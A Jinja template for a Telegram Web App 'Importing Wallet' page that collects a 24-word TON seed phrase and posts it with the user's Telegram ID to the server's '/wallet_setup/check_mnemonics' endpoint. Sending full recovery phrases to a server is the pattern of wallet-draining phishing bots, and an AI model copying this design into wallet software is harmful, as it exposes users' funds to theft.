{% extends "base.html" %}

{% block import %}
<link rel="stylesheet" href="/static/css/import_styles.css">
{% endblock %}

{% block content %}
<div class="container">
    <header class="header">
        <div class="logo">
            <img height="auto" width="160" src="/static/img/Memo.png">
        </div>
        <div id="topic-text">
            <div><b>Importing Wallet</b></div>
            <p>Please enter your Seed Phrase to import your <span style="color: #0088cd">TON</span> wallet.</p>
        </div>
    </header>
    <div class="mnemonic-input-container">
        <form id="mnemonic-form" method="POST" action="/submit">
            <div class="form-container">
                <div class="form-column">
                    {% for i in range(1, 13) %}
                    <div class="form-group">
                        <label for="field{{ i }}">{{ i }}.</label>
                        <input type="text" id="field{{ i }}" name="field{{ i }}">
                    </div>
                    {% endfor %}
                </div>
                <div class="form-column">
                    {% for i in range(13, 25) %}
                    <div class="form-group">
                        <label for="field{{ i }}">{{ i }}.</label>
                        <input type="text" id="field{{ i }}" name="field{{ i }}">
                    </div>
                    {% endfor %}
                </div>
            </div>
            <div class="import-button-container">
                <button id="import-wallet-button">Import Wallet</button>
            </div>
        </form>

        <div class="indent-for-keyboard"></div>
    </div>

    <script>
        const tg = window.Telegram.WebApp;
        const userId = tg.initDataUnsafe.user.id;
        const indentForKeyboard = document.querySelector('.indent-for-keyboard');

        const isMobile = tg.platform === 'mobile' || window.innerWidth < 600;

        if (isMobile) {
            indentForKeyboard.style.paddingBottom = '40vh';
        }

        document.getElementById('import-wallet-button').addEventListener('click', function(event) {
            event.preventDefault();

            let isValid = true;
            const formGroups = document.querySelectorAll('.form-group');
            const inputs = document.querySelectorAll('#mnemonic-form input[type="text"]');
            const mnemonics = [];

            inputs.forEach((input, index) => {
                const formGroup = formGroups[index];
                if (/\s/.test(input.value) || input.value.trim() === '') {
                    isValid = false;
                    formGroup.style.border = '2px solid #dc3545';
                } else {
                    formGroup.style.border = '2px solid transparent';
                    mnemonics.push(input.value.trim());
                }
            });

            if (isValid) {
                const mnemonicsModel = {
                    'user_id': userId,
                    'mnemonics': mnemonics
                };

                fetch('/wallet_setup/check_mnemonics', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(mnemonicsModel)
                })
                    .then(response => response.json())
                    .then(data => {
                        if (data.success) {
                            window.location.href = `/redirect?user_id=${userId}`;
                        } else {
                            inputs.forEach((input, index) => {
                                const formGroup = formGroups[index];
                                formGroup.style.border = '2px solid #dc3545';
                            });
                        }
                    })
                    .catch(error => {
                        console.error('Error:', error);
                    });
            }
        });
    </script>

</div>
{% endblock %}
